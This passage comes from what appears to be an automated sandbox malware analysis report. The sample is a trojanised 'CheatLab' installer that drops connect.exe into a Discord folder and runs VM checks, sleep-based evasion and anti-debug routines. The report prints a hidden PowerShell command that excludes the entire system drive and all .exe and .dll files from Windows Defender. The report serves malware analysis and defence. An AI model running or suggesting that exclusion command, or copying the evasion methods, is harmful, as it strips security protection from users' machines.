                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep count: 6813 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 1967 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe TID: 7896Thread sleep count: 210 > 30Jump to behavior
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe TID: 7896Thread sleep time: -210000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 7636Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 7608Thread sleep count: 2390 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 7608Thread sleep count: 3378 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 4284Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeLast function: Thread delayed
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6813Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1967Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWindow / User API: threadDelayed 2390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWindow / User API: threadDelayed 3378Jump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-32887
                    Source: C:\Windows\Installer\MSIF5A3.tmpAPI coverage: 5.9 %
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID538.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID4A9.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID626.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF3BA.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID4E9.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF3EA.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI8FE.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID4C9.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeAPI call chain: ExitProcess graph end node
                    Source: MSID5C6.tmp.0.drBinary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
                    Source: connect.exe, 00000016.00000003.2339663019.0000000000849000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2399724380.0000000000849000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2314566233.0000000000849000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_0061B02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_0061B02D
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0041C000 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject,22_2_0041C000
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_0061AD78 mov eax, dword ptr fs:[00000030h]5_2_0061AD78
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_00612DCC mov ecx, dword ptr fs:[00000030h]5_2_00612DCC
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0041C000 mov edx, dword ptr fs:[00000030h]22_2_0041C000
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_005ED0A5 IsDebuggerPresent,OutputDebugStringW,5_2_005ED0A5
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_005E2310 GetProcessHeap,5_2_005E2310
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C57780 LdrInitializeThunk,22_2_07C57780
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_006033A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_006033A8
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_0060353F SetUnhandledExceptionFilter,5_2_0060353F
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_00602968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00602968
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_00606E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00606E1B
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77242D4C8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,11_2_00007FF77242D4C8
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77242DBB8 SetUnhandledExceptionFilter,11_2_00007FF77242DBB8
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77242D9D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF77242D9D4
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772458900 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF772458900
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77242D0B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF77242D0B0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4FDBB8 SetUnhandledExceptionFilter,17_2_00007FF6DE4FDBB8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4FD9D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF6DE4FD9D4
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4FD0B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF6DE4FD0B0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE528900 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF6DE528900
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_004080CD _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_004080CD
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040C35A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0040C35A
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0041145F SetUnhandledExceptionFilter,22_2_0041145F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040A46F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_0040A46F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040A7DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_0040A7DA

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.luaJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_005E52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,5_2_005E52F0
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: EnumSystemLocalesW,5_2_0061E0C6
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: EnumSystemLocalesW,5_2_00617132
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: EnumSystemLocalesW,5_2_0061E111
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: EnumSystemLocalesW,5_2_0061E1AC
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_0061E237
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: GetLocaleInfoEx,5_2_006023F8
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: GetLocaleInfoW,5_2_0061E48A
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0061E5B3
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: GetLocaleInfoW,5_2_006176AF
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: GetLocaleInfoW,5_2_0061E6B9
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_0061E788
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: EnumSystemLocalesW,11_2_00007FF7724592FC
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: try_get_function,GetLocaleInfoW,11_2_00007FF772459934
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,11_2_00007FF77246A03C
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: EnumSystemLocalesW,11_2_00007FF77246A388
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: EnumSystemLocalesW,11_2_00007FF77246A458
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00007FF77246A894
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF77246AA70
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,17_2_00007FF6DE53A03C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: try_get_function,GetLocaleInfoW,17_2_00007FF6DE529934
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: EnumSystemLocalesW,17_2_00007FF6DE5292FC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00007FF6DE53AA70
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_00007FF6DE53A894
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: EnumSystemLocalesW,17_2_00007FF6DE53A388
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: EnumSystemLocalesW,17_2_00007FF6DE53A458
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,22_2_00418849
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,22_2_00418815
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,22_2_00414972
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,22_2_00418988
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,22_2_00414A89
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,22_2_00414B21
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,22_2_004153C0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,22_2_0040E3E4
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,22_2_00413BE6
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,22_2_00414B95
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,22_2_0041554E
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,22_2_00414D67
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,22_2_0040D56D
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,22_2_00413578
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,22_2_00414E28
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,22_2_00413E3E
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,22_2_004186C5
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,22_2_00414ECB
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,22_2_00414E8F
                    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
